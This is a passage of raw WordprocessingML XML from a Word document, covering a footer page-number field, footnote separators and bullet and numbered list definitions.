        <w:lang w:eastAsia="zh-CN"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00E13954">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>17</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w:rsidRPr="008F1B32" w:rsidR="00C07D0E" w:rsidRDefault="00C07D0E" w14:paraId="1504E947" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:rFonts w:ascii="Palatino Linotype" w:hAnsi="Palatino Linotype"/>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2010F" w:rsidRDefault="0092010F" w14:paraId="483F264A" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0092010F" w:rsidRDefault="0092010F" w14:paraId="33CCF475"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A133"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="B450FAAC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="32B817FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="EA14887E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D074A04E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="52DE6528">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="435A2C66">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="91C232A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9B466932">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="394C8A04">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0224CCA1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="7F40539A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A4F4C630">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B9DE223C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9BC09C9E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C5DE7510">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="634A72FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1CE4BB90">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="FBAED100">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6458FEDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="034F2F88"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="56ECEDAA"/>
    <w:lvl w:ilvl="0" w:tplc="23025EBE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="103410BE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8EA24DCE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="55EA4A52" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9B4C4D6E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="F6826FEA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C0B8CD32" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B0567BF8" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6FEC0DDC" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0528E913"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="19D8ED0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FA9E0F5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="69D6B2AE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5AC4A64E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="AEDA6E10">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="BB5E8064">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0CAC7736">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D1BE1E0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C6DA3DE6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="076B8795"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="359888E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3BB613EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="5DFE4528">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="814A81C0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0DA619BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="374CE60C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1C7077A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="160ABBE4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BAC49BF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="08D3E8B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="B0BC9B06">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C9D0BDA4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D1A41454">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="564867AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9612A53C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6A860FB0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="15825E7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="197C3136">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6F241752">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="09C642B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="042C50C0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="56B02948">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="09C65D3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FA5088C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="29F05C8C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C98A2E3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5F604A5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BD4CBB0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E5A6BA4C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0B3179A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="8E8AF13A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D67E5D62">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D80C041C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0666F846">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="59EE9008">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="3072DA38">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
